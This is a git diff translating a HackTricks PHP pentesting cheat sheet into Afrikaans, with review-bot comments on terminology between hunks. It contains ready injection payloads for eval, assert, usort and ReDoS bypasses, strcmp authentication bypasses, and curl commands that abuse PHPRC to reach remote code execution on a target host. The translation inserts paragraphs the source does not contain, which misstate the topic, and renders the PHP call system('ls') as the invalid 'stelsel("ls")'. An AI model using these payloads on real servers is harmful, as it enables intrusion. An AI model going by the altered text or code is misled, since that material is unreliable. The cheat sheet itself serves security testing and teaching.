diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md index a19307868..f5b4af8ae 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md @@ -1,64 +1,59 @@ -# PHP Tricks +# PHP Truuks
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Cookies common location: +## Koekies algemene plek: -This is also valid for phpMyAdmin cookies. - -Cookies: +Dit is ook geldig vir phpMyAdmin-koekies. +Koekies: ``` PHPSESSID phpMyAdmin ``` - -Locations: - +Liggings: ``` /var/lib/php/sessions /var/lib/php5/ /tmp/ Example: ../../../../../../tmp/sess_d1d531db62523df80e1153ada1d4b02e ``` +## Omseil PHP-vergelykings -## Bypassing PHP comparisons +### Los vergelykings/Type Juggling ( == ) -### Loose comparisons/Type Juggling ( == ) +As `==` in PHP gebruik word, is daar onverwagte gevalle waar die vergelyking nie soos verwag gedra nie. Dit is omdat "==" slegs waardes vergelyk wat na dieselfde tipe omskep is. As jy ook wil vergelyk dat die tipe van die vergelykte data dieselfde is, moet jy `===` gebruik. -If `==` is used in PHP, then there are unexpected cases where the comparison doesn't behave as expected. This is because "==" only compare values transformed to the same type, if you also want to compare that the type of the compared data is the same you need to use `===`. 
- -PHP comparison tables: [https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php) +PHP-vergelykingstabelle: [https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php) ![](<../../../.gitbook/assets/image (40) (1).png>) {% file src="../../../.gitbook/assets/EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf" %} -* `"string" == 0 -> True` A string which doesn't start with a number is equals to a number -* `"0xAAAA" == "43690" -> True` Strings composed by numbers in dec or hex format can be compare to other numbers/strings with True as result if the numbers were the same (numbers in a string are interpreted as numbers) -* `"0e3264578" == 0 --> True` A string starting with "0e" and followed by anything will be equals to 0 -* `"0X3264578" == 0X --> True` A string starting with "0" and followed by any letter (X can be any letter) and followed by anything will be equals to 0 -* `"0e12334" == "0" --> True` This is very interesting because in some cases you can control the string input of "0" and some content that is being hashed and compared to it. Therefore, if you can provide a value that will create a hash starting with "0e" and without any letter, you could bypass the comparison. 
You can find **already hashed strings** with this format here: [https://github.com/spaze/hashes](https://github.com/spaze/hashes) -* `"X" == 0 --> True` Any letter in a string is equals to int 0 +* `"string" == 0 -> True` 'n String wat nie met 'n nommer begin nie, is gelyk aan 'n nommer +* `"0xAAAA" == "43690" -> True` Strings wat uit nommers in desimale of heksadesimale formaat bestaan, kan vergelyk word met ander nommers/strings met 'n True-resultaat as die nommers dieselfde was (nommers in 'n string word geïnterpreteer as nommers) +* `"0e3264578" == 0 --> True` 'n String wat met "0e" begin en deur enigiets gevolg word, sal gelyk wees aan 0 +* `"0X3264578" == 0X --> True` 'n String wat met "0" begin en deur enige letter gevolg word (X kan enige letter wees) en deur enigiets gevolg word, sal gelyk wees aan 0 +* `"0e12334" == "0" --> True` Dit is baie interessant omdat jy in sommige gevalle die string-inset van "0" en 'n inhoud wat gehash en daarmee vergelyk word, kan beheer. Daarom, as jy 'n waarde kan voorsien wat 'n hash sal skep wat met "0e" begin en sonder enige letter is, kan jy die vergelyking omseil. 
Jy kan **reeds gehashte strings** met hierdie formaat hier vind: [https://github.com/spaze/hashes](https://github.com/spaze/hashes) +* `"X" == 0 --> True` Enige letter in 'n string is gelyk aan int 0 -More info in [https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09](https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09) +Meer inligting by [https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09](https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09) ### **in\_array()** -**Type Juggling** also affects to the `in_array()` function by default (you need to set to true the third argument to make an strict comparison): - +**Type Juggling** beïnvloed ook die `in_array()`-funksie standaard (jy moet die derde argument op waar stel om 'n streng vergelyking te maak): ```php $values = array("apple","orange","pear","grape"); var_dump(in_array(0, $values)); 
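Review bot: in the loose-comparison bullets `nommer` is used for `number` throughout (`'n String wat nie met 'n nommer begin nie, is gelyk aan 'n nommer`); in Afrikaans `nommer` is an identifier such as a phone or house number, while a numeric value is `getal`, so these bullets should read `getal`/`getalle`. The heading `+## Koekies algemene plek:` is a word-for-word rendering of `Cookies common location`; `## Algemene ligging van koekies:` reads naturally and matches the `Liggings:` label used just below it.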
@@ -66,36 +61,30 @@ var_dump(in_array(0, $values)); var_dump(in_array(0, $values, true)); //False ``` - ### strcmp()/strcasecmp() -If this function is used for **any authentication check** (like checking the password) and the user controls one side of the comparison, he can send an empty array instead of a string as the value of the password (`https://example.com/login.php/?username=admin&password[]=`) and bypass this check: - +Indien hierdie funksie gebruik word vir **enige verifikasie kontrole** (soos die wagwoordkontrole) en die gebruiker beheer een kant van die vergelyking, kan hy 'n leë reeks stuur in plaas van 'n string as die waarde van die wagwoord (`https://example.com/login.php/?username=admin&password[]=`) en hierdie kontrole omseil: ```php if (!strcmp("real_pwd","real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; } // Real Password if (!strcmp(array(),"real_pwd")) { echo "Real Password"; } else { echo "No Real Password"; } // Real Password ``` +Dieselfde fout kom voor met `strcasecmp()` -The same error occurs with `strcasecmp()` - -### Strict type Juggling - -Even if `===` is **being used** there could be errors that makes the **comparison vulnerable** to **type juggling**. For example, if the comparison is **converting the data to a different type of object before comparing**: +### Streng tipe jonglering +Selfs as `===` gebruik word, kan daar foute wees wat die vergelyking vatbaar maak vir tipe jonglering. Byvoorbeeld, as die vergelyking die data omskakel na 'n ander tipe objek voordat dit vergelyk word: ```php (int) "1abc" === (int) "1xyz" //This will be true ``` - ### preg\_match(/^.\*/) -**`preg_match()`** could be used to **validate user input** (it **checks** if any **word/regex** from a **blacklist** is **present** on the **user input** and if it's not, the code can continue it's execution). 
+**`preg_match()`** kan gebruik word om **gebruikersinvoer te valideer** (dit **kontroleer** of enige **woord/regex** van 'n **swartlys** teenwoordig is in die **gebruikersinvoer** en as dit nie is nie, kan die kode voortgaan met sy uitvoering). -#### New line bypass - -However, when delimiting the start of the regexp`preg_match()` **only checks the first line of the user input**, then if somehow you can **send** the input in **several lines**, you could be able to bypass this check. Example: +#### Nuwe lyn omseiling +Maar wanneer die begin van die regexp bepaal word, **kontroleer `preg_match()` slegs die eerste lyn van die gebruikersinvoer**, dus as jy op een of ander manier die invoer in **verskeie lyne kan stuur**, kan jy hierdie kontrole omseil. Voorbeeld: ```php $myinput="aaaaaaa 11111111"; //Notice the new line 
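Review bot: in the `strcmp()/strcasecmp()` paragraph `'n leë reeks` translates `an empty array`, but `reeks` means a sequence or series; the PHP array passed via `password[]=` is a `skikking`, so write `'n leë skikking` so the prose matches the `strcmp(array(),"real_pwd")` line in the code block below it.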
@@ -108,48 +97,60 @@ echo preg_match("/^.*1/",$myinput); echo preg_match("/^.*1.*$/",$myinput); //0 --> In this scenario preg_match DOESN'T find the char "1" ``` - -To bypass this check you could **send the value with new-lines urlencoded** (`%0A`) or if you can send **JSON data**, send it in **several lines**: - +Om hierdie kontrole te omseil, kan jy die waarde stuur met nuwe lyne urlencoded (`%0A`) of as jy JSON-data kan stuur, stuur dit in verskeie lyne: ```php { - "cmd": "cat /etc/passwd" +"cmd": "cat /etc/passwd" } ``` +Vind 'n voorbeeld hier: [https://ramadistra.dev/fbctf-2019-rceservice](https://ramadistra.dev/fbctf-2019-rceservice) -Find an example here: [https://ramadistra.dev/fbctf-2019-rceservice](https://ramadistra.dev/fbctf-2019-rceservice) - -#### **Length error bypass** - -(This bypass was tried apparently on PHP 5.2.5 and I couldn't make it work on PHP 7.3.15)\ -If you can send to `preg_match()` a valid very **large input**, it **won't be able to process it** and you will be able to **bypass** the check. For example, if it is blacklisting a JSON you could send: +#### **Lengte fout omseil** +(Die omseil is blykbaar probeer op PHP 5.2.5 en ek kon dit nie werk kry op PHP 7.3.15 nie)\ +As jy 'n geldige baie **groot inset** na `preg_match()` kan stuur, sal dit **nie in staat wees om dit te verwerk** en jy sal in staat wees om die toets te **omseil**. 
Byvoorbeeld, as dit 'n JSON op 'n swartlys plaas, kan jy stuur: ```bash payload = '{"cmd": "ls -la", "injected": "'+ "a"*1000001 + '"}' ``` - -From: [https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0](https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challenge-part-1-4bce03e2ecb0) - #### ReDoS Bypass -Trick from: [https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223](https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223) +Truuk vanaf: [https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223](https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223)
-In short the problem happens because the `preg_*` functions in PHP builds upon the [PCRE library](http://www.pcre.org/). In PCRE certain regular expressions are matched by using a lot of recursive calls, which uses up a lot of stack space. It is possible to set a limit on the amount of recursions allowed, but in PHP this limit [defaults to 100.000](http://php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit) which is more than fits in the stack. +In kort gebeur die probleem omdat die `preg_*` funksies in PHP bou op die [PCRE-biblioteek](http://www.pcre.org/). In PCRE word sekere regulêre uitdrukkings deur middel van baie herhalende oproepe aangepas, wat baie stakruimte gebruik. Dit is moontlik om 'n limiet te stel op die aantal herhalings wat toegelaat word, maar in PHP is hierdie limiet [standaard 100.000](http://php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit), wat meer is as wat in die stak pas. -[This Stackoverflow thread](http://stackoverflow.com/questions/7620910/regexp-in-preg-match-function-returning-browser-error) was also linked in the post where it is talked more in depth about this issue. Our task was now clear:\ -**Send an input that would make the regex do 100\_000+ recursions, causing SIGSEGV, making the `preg_match()` function return `false` thus making the application think that our input is not malicious, throwing the surprise at the end of the payload something like `{system()}` to get SSTI --> RCE --> flag :)**. 
- -Well, in regex terms, we're not actually doing 100k "recursions", but instead we're counting "backtracking steps", which as the [PHP documentation](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit) states it defaults to 1\_000\_000 (1M) in the `pcre.backtrack_limit` variable.\ -To reach that, `'X'*500_001` will result in 1 million backtracking steps (500k forward and 500k backwards): +[Hierdie Stackoverflow-draad](http://stackoverflow.com/questions/7620910/regexp-in-preg-match-function-returning-browser-error) is ook gekoppel in die pos waar daar meer in diepte oor hierdie probleem gepraat word. Ons taak was nou duidelik:\ +**Stuur 'n inset wat die regex 100\_000+ herhalings laat doen, wat SIGSEGV veroorsaak, die `preg_match()` funksie laat `false` terugkeer en sodoende die toepassing laat dink dat ons inset nie skadelik is nie, en aan die einde van die payload die verrassing gooi soos `{system()}` om SSTI --> RCE --> vlag te kry :)**. +Wel, in regex-terme doen ons eintlik nie 100k "herhalings" nie, maar eerder tel ons "terugspoortreeks", wat soos die [PHP-dokumentasie](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit) dit stel, standaard 1\_000\_000 (1M) is in die `pcre.backtrack_limit` veranderlike.\ +Om dit te bereik, sal `'X'*500_001` lei tot 1 miljoen terugspoortreeks (500k vorentoe en 500k agtertoe): ```python payload = f"@dimariasimone on{'X'*500_001} {{system('id')}}" ``` -### Type Juggling for PHP obfuscation +### Tipe Jonglering vir PHP obfuskasie +Type jonglering is 'n tegniek wat gebruik word vir PHP obfuskasie. Dit behels die manipulasie van die tipe van 'n waarde om dit te laat lyk asof dit 'n ander tipe is. Hierdie tegniek kan gebruik word om kode te verberg en te verwar, wat dit moeiliker maak vir aanvallers om die ware funksionaliteit van die kode te verstaan. + +In PHP, word tipes geïdentifiseer deur die waardes wat hulle verteenwoordig. 
Byvoorbeeld, 'n string kan geïdentifiseer word deur aanhalingstekens rondom die waarde te plaas, terwyl 'n getal geen aanhalingstekens het nie. Deur die tipe van 'n waarde te manipuleer, kan 'n aanvaller die kode moeiliker maak om te ontleed en te verstaan. + +Hier is 'n voorbeeld van hoe tipe jonglering in PHP gebruik kan word: + +```php +$var1 = "123"; +$var2 = 123; + +if ($var1 == $var2) { + echo "Die waardes is gelyk"; +} else { + echo "Die waardes is nie gelyk nie"; +} +``` + +In hierdie voorbeeld sal die uitset "Die waardes is gelyk" wees, alhoewel die twee veranderlikes verskillende tipes het. Dit is omdat PHP outomaties probeer om die tipes van die waardes aan te pas om hulle te vergelyk. Hierdie gedrag kan gebruik word om kode te obfuskasie deur die tipe van waardes te manipuleer. + +Dit is belangrik om te verstaan dat tipe jonglering nie 'n veilige manier is om kode te obfuskasie nie. Dit kan die kode moeiliker maak om te lees, maar dit sal nie die kode volledig beskerm teen 'n bekwame aanvaller nie. Dit is slegs een van die vele tegnieke wat gebruik kan word in 'n algehele obfuskasie-strategie. ```php $obfs = "1"; //string "1" $obfs++; //int 2 
@@ -160,34 +161,30 @@ $obfs = 3+2 * (TRUE + TRUE); //int 7 $obfs .= ""; //string "7" $obfs += ""; //int 7 ``` +## Voer uit na omskakeling (EAR) -## Execute After Redirect (EAR) - -If PHP is redirecting to another page but no **`die`** or **`exit`** function is **called after the header `Location`** is set, the PHP continues executing and appending the data to the body: - +As PHP na 'n ander bladsy omskakel, maar geen **`die`** of **`exit`** funksie word **geroep nadat die `Location`-kop ingestel is nie**, gaan PHP voort om uit te voer en die data aan die liggaam toe te voeg: ```php ``` +## Meer truuks -## More tricks - -* **register\_globals**: In **PHP < 4.1.1.1** or if misconfigured, **register\_globals** may be active (or their behavior is being mimicked). This implies that in global variables like $\_GET if they have a value e.g. $\_GET\["param"]="1234", you can access it via **$param. Therefore, by sending HTTP parameters you can overwrite variables** that are used within the code. -* The **PHPSESSION cookies of the same domain are stored in the same place**, therefore if within a domain **different cookies are used in different paths** you can make that a path **accesses the cookie of the path** setting the value of the other path cookie.\ - This way if **both paths access a variable with the same name** you can make the **value of that variable in path1 apply to path2**. And then path2 will take as valid the variables of path1 (by giving the cookie the name that corresponds to it in path2). -* When you have the **usernames** of the users of the machine. Check the address: **/\~\** to see if the php directories are activated. -* [**LFI and RCE using php wrappers**](../../../pentesting-web/file-inclusion/) +* **register\_globals**: In **PHP < 4.1.1.1** of as dit verkeerd gekonfigureer is, kan **register\_globals** aktief wees (of hul gedrag word nageboots). Dit impliseer dat in globale veranderlikes soos $\_GET, as hulle 'n waarde het bv. 
$\_GET\["param"]="1234", kan jy dit toegang via **$param. Deur dus HTTP parameters te stuur, kan jy veranderlikes oorskryf** wat binne die kode gebruik word. +* Die **PHPSESSION-koekies van dieselfde domein word in dieselfde plek gestoor**, daarom as binne 'n domein **verskillende koekies in verskillende paaie gebruik word**, kan jy maak dat 'n paadjie **die koekie van die paadjie toegang** deur die waarde van die ander paadjie se koekie in te stel.\ +Op hierdie manier, as **beide paadjies 'n veranderlike met dieselfde naam toegang**, kan jy maak dat die **waarde van daardie veranderlike in paadjie1 van toepassing is op paadjie2**. En dan sal paadjie2 die veranderlikes van paadjie1 as geldig beskou (deur die koekie die naam te gee wat daarmee ooreenstem in paadjie2). +* Wanneer jy die **gebruikersname** van die gebruikers van die masjien het, kyk na die adres: **/\~\** om te sien of die php-direktorieë geaktiveer is. +* [**LFI en RCE met behulp van php wrappers**](../../../pentesting-web/file-inclusion/) ### password\_hash/password\_verify -This functions are typically used in PHP to **generate hashes from passwords** and to to **check** if a password is correct compared with a hash.\ -The supported algorithms are: `PASSWORD_DEFAULT` and `PASSWORD_BCRYPT` (starts with `$2y$`). Note that **PASSWORD\_DEFAULT is frequently the same as PASSWORD\_BCRYPT.** And currently, **PASSWORD\_BCRYPT** has a **size limitation in the input of 72bytes**. Therefore, when you try to hash something larger than 72bytes with this algorithm only the first 72B will be used: - +Hierdie funksies word tipies gebruik in PHP om **hassies van wagwoorde te genereer** en om te **kontroleer** of 'n wagwoord korrek is in vergelyking met 'n hassie.\ +Die ondersteunde algoritmes is: `PASSWORD_DEFAULT` en `PASSWORD_BCRYPT` (begin met `$2y$`). Let daarop dat **PASSWORD\_DEFAULT dikwels dieselfde as PASSWORD\_BCRYPT is**. En tans het **PASSWORD\_BCRYPT** 'n **groottebeperking in die inset van 72 byte**. 
Daarom, as jy iets groter as 72 byte met hierdie algoritme probeer hassie, sal slegs die eerste 72B gebruik word: ```php $cont=71; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSW False 
@@ -195,34 +192,28 @@ False $cont=72; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("a",$cont)."b", PASSW True ``` +### HTTP-koppele om PHP-foute te misbruik -### HTTP headers bypass abusing PHP errors - -If a **PHP page is printing errors and echoing back some input provided by the user**, the user can make the PHP server print back some **content long enough** so when it tries to **add the headers** into the response the server will throw and error.\ -In the following scenario the **attacker made the server throw some big errors**, and as you can see in the screen when php tried to **modify the header information, it couldn't** (so for example the CSP header wasn't sent to the user): +As 'n **PHP-bladsy foute druk en gebruikersinvoer terugvoer**, kan die gebruiker die PHP-bediener laat terugsit **inhoud wat lank genoeg is**, sodat wanneer dit probeer om die koppele by die antwoord te voeg, die bediener 'n fout sal gooi.\ +In die volgende scenario het die **aanvaller die bediener groot foute laat gooi**, en soos u kan sien op die skerm, kon PHP nie **die kopinligting wysig nie** (soos byvoorbeeld die CSP-kop is nie na die gebruiker gestuur nie): ![](<../../../.gitbook/assets/image (465).png>) -## Code execution +## Kode-uitvoering -**system("ls");**\ +**stelsel("ls");**\ **\`ls\`;**\ **shell\_exec("ls");** -[Check this for more useful PHP functions](php-useful-functions-disable\_functions-open\_basedir-bypass/) - -### **RCE via** **preg\_replace()** - +[Kyk hier vir meer nuttige PHP-funksies](php-useful-functions-disable\_functions-open\_basedir-bypass/) ```php preg_replace(pattern,replace,base) preg_replace("/a/e","phpinfo()","whatever") ``` - -To execute the code in the "replace" argument is needed at least one match.\ -This option of preg\_replace has been **deprecated as of PHP 5.5.0.** +Om die kode in die "vervang" argument uit te voer, is ten minste een ooreenstemming nodig.\ +Hierdie opsie van preg\_replace is **verouderd vanaf PHP 
5.5.0.** ### **RCE via Eval()** - ``` '.system('uname -a'); $dummy=' '.system('uname -a');# 
@@ -230,27 +221,23 @@ This option of preg\_replace has been **deprecated as of PHP 5.5.0.** '.phpinfo().' ``` - ### **RCE via Assert()** -This function within php allows you to **execute code that is written in a string** in order to **return true or false** (and depending on this alter the execution). Usually the user variable will be inserted in the middle of a string. For example:\ -`assert("strpos($_GET['page']),'..') === false")` --> In this case to get **RCE** you could do: - +Hierdie funksie binne php stel jou in staat om **kode uit te voer wat in 'n string geskryf is** om sodoende **waar of vals terug te gee** (en afhangend hiervan die uitvoering te verander). Gewoonlik word die gebruiker se veranderlike in die middel van 'n string ingevoeg. Byvoorbeeld:\ +`assert("strpos($_GET['page']),'..') === false")` --> In hierdie geval kan jy **RCE** verkry deur: ``` ?page=a','NeVeR') === false and system('ls') and strpos('a ``` +Jy sal die kode se sintaks moet **breek**, jou **payload** byvoeg, en dit dan weer **regmaak**. Jy kan **logiese operasies** soos "**en**" of "%26%26" of "|" gebruik. Let daarop dat "of", "||" nie werk nie, want as die eerste voorwaarde waar is, sal ons payload nie uitgevoer word nie. Op dieselfde manier werk ";" nie, omdat ons payload nie uitgevoer sal word nie. -You will need to **break** the code **syntax**, **add** your **payload**, and then **fix it again**. You can use **logic operations** such as "**and" or "%26%26" or "|"**. Note that "or", "||" doesn't work because if the first condition is true our payload won't get executed. The same way ";" doesn't work as our payload won't be executed. 
+**Ander opsie** is om die uitvoering van die opdrag by die string te voeg: `'.highlight_file('.passwd').'` -**Other option** is to add to the string the execution of the command: `'.highlight_file('.passwd').'` - -**Other option** (if you have the internal code) is to modify some variable to alter the execution: `$file = "hola"` +**Ander opsie** (as jy die interne kode het) is om 'n sekere veranderlike te wysig om die uitvoering te verander: `$file = "hola"` ### **RCE via usort()** -This function is used to sort an array of items using an specific function.\ -To abuse this function: - +Hierdie funksie word gebruik om 'n lys items te sorteer deur 'n spesifieke funksie te gebruik.\ +Om hierdie funksie te misbruik: ```php VALUE: );phpinfo();# 
@@ -261,73 +248,69 @@ VALUE: );phpinfo();# ```php VALUE: );}[PHP CODE];# ``` +Jy kan ook **//** gebruik om die res van die kode te kommentaar. -You can also use **//** to comment the rest of the code. +Om die aantal hakies wat jy moet sluit te bepaal: -To discover the number of parenthesis that you need to close: - -* `?order=id;}//`: we get an error message (`Parse error: syntax error, unexpected ';'`). We are probably missing one or more brackets. -* `?order=id);}//`: we get a **warning**. That seems about right. -* `?order=id));}//`: we get an error message (`Parse error: syntax error, unexpected ')' i`). We probably have too many closing brackets. +* `?order=id;}//`: ons kry 'n foutboodskap (`Parse error: syntax error, unexpected ';'`). Ons mis waarskynlik een of meer hakies. +* `?order=id);}//`: ons kry 'n **waarskuwing**. Dit lyk reg. +* `?order=id));}//`: ons kry 'n foutboodskap (`Parse error: syntax error, unexpected ')' i`). Ons het waarskynlik te veel sluitende hakies. ### **RCE via .httaccess** -If you can **upload** a **.htaccess**, then you can **configure** several things and even execute code (configuring that files with extension .htaccess can be **executed**). +As jy 'n **.htaccess** kan **oplaai**, kan jy verskeie dinge instel en selfs kode uitvoer (deur te konfigureer dat lêers met die .htaccess-uitbreiding **uitgevoer** kan word). -Different .htaccess shells can be found [here](https://github.com/wireghoul/htshells) +Verskillende .htaccess-skulpe kan [hier](https://github.com/wireghoul/htshells) gevind word. ### RCE via Env Variables -If you find a vulnerability that allows you to **modify env variables in PHP** (and another one to upload files, although with more research maybe this can be bypassed), you could abuse this behaviour to get **RCE**. 
+As jy 'n kwesbaarheid vind wat jou in staat stel om **omgewingsveranderlikes in PHP te wysig** (en nog een om lêers op te laai, alhoewel dit dalk omseil kan word deur meer navorsing), kan jy hierdie gedrag misbruik om **RCE** te kry. -* [**`LD_PRELOAD`**](../../../linux-hardening/privilege-escalation/#ld\_preload-and-ld\_library\_path): This env variable allows you load arbitrary libraries when executing other binaries (although in this case it might not work). -* **`PHPRC`** : Instructs PHP on **where to locate its configuration file**, usually called `php.ini`. If you can upload your own config file, then, use `PHPRC` to point PHP at it. Add an **`auto_prepend_file`** entry specifying a second uploaded file. This second file contains normal **PHP code, which is then executed** by the PHP runtime before any other code. - 1. Upload a PHP file containing our shellcode - 2. Upload a second file, containing an **`auto_prepend_file`** directive instructing the PHP preprocessor to execute the file we uploaded in step 1 - 3. Set the `PHPRC` variable to the file we uploaded in step 2. - * Get more info on how to execute this chain [**from the original report**](https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/). -* **PHPRC** - another option - * If you **cannot upload files**, you could use in FreeBSD the "file" `/dev/fd/0` which contains the **`stdin`**, being the **body** of the request sent to the `stdin`: - * `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'` - * Or to get RCE, enable **`allow_url_include`** and prepend a file with **base64 PHP code**: - * `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'` - * Technique [**from this report**](https://vulncheck.com/blog/juniper-cve-2023-36845). 
+* [**`LD_PRELOAD`**](../../../linux-hardening/privilege-escalation/#ld\_preload-and-ld\_library\_path): Hierdie omgewingsveranderlike stel jou in staat om arbitrêre biblioteke te laai wanneer jy ander binêre lêers uitvoer (alhoewel dit in hierdie geval dalk nie werk nie). +* **`PHPRC`** : Gee PHP instruksies oor **waar om sy konfigurasie-lêer** te vind, wat gewoonlik `php.ini` genoem word. As jy jou eie konfigurasie-lêer kan oplaai, gebruik dan `PHPRC` om PHP daarheen te verwys. Voeg 'n **`auto_prepend_file`**-inskrywing by wat 'n tweede opgelaai lêer spesifiseer. Hierdie tweede lêer bevat normale **PHP-kode wat dan deur die PHP-uitvoeringstyd voor enige ander kode uitgevoer** word. +1. Laai 'n PHP-lêer op wat ons skelkode bevat +2. Laai 'n tweede lêer op wat 'n **`auto_prepend_file`**-riglyn bevat wat die PHP-voorverwerker instrueer om die lêer wat ons in stap 1 opgelaai het, uit te voer +3. Stel die `PHPRC`-veranderlike in op die lêer wat ons in stap 2 opgelaai het. +* Kry meer inligting oor hoe om hierdie ketting uit te voer [**uit die oorspronklike verslag**](https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/). +* **PHPRC** - nog 'n opsie +* As jy **nie lêers kan oplaai nie**, kan jy in FreeBSD die "lêer" `/dev/fd/0` gebruik wat die **`stdin`** bevat, wat die **liggaam** van die versoek wat na die `stdin` gestuur is, is: +* `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'` +* Of om RCE te kry, aktiveer **`allow_url_include`** en voeg 'n lêer met **base64 PHP-kode** voor: +* `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'` +* Tegniek [**uit hierdie verslag**](https://vulncheck.com/blog/juniper-cve-2023-36845). 
-## PHP Static analysis - -Look if you can insert code in calls to these functions (from [here](https://www.youtube.com/watch?v=SyWUsN0yHKI\&feature=youtu.be)): +## PHP Statische analise +Kyk of jy kode kan invoeg in oproepe na hierdie funksies (van [hier](https://www.youtube.com/watch?v=SyWUsN0yHKI\&feature=youtu.be)): ```php exec, shell_exec, system, passthru, eval, popen unserialize, include, file_put_cotents $_COOKIE | if #This mea ``` +As jy 'n PHP-toepassing aan die debug is, kan jy foutafdrukke globaal aktiveer in `/etc/php5/apache2/php.ini` deur `display_errors = On` by te voeg en Apache te herlaai: `sudo systemctl restart apache2` -If yo are debugging a PHP application you can globally enable error printing in`/etc/php5/apache2/php.ini` adding `display_errors = On` and restart apache : `sudo systemctl restart apache2` +### Ontkluwing van PHP-kode -### Deobfuscating PHP code +Jy kan die webwerf [www.unphp.net](http://www.unphp.net) gebruik om PHP-kode te ontkluur. -You can use the **web**[ **www.unphp.net**](http://www.unphp.net) **to deobfuscate php code.** +## PHP Wrappers & Protokolle -## PHP Wrappers & Protocols +PHP Wrappers en protokolle kan jou in staat stel om skryf- en leesbeskerming in 'n stelsel te omseil en dit te kompromitteer. Vir [meer inligting, besoek hierdie bladsy](../../../pentesting-web/file-inclusion/#lfi-rfi-using-php-wrappers-and-protocols). -PHP Wrappers ad protocols could allow you to **bypass write and read protections** in a system and compromise it. For [**more information check this page**](../../../pentesting-web/file-inclusion/#lfi-rfi-using-php-wrappers-and-protocols). 
+## Xdebug ongeagte RCE -## Xdebug unauthenticated RCE - -If you see that **Xdebug** is **enabled** in a `phpconfig()` output you should try to get RCE via [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit) - -## Variable variables +As jy sien dat Xdebug geaktiveer is in 'n `phpconfig()` uitset, moet jy probeer om RCE te kry deur [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit) te gebruik. +## Veranderlike veranderlikes ```php $x = 'Da'; $$x = 'Drums'; 
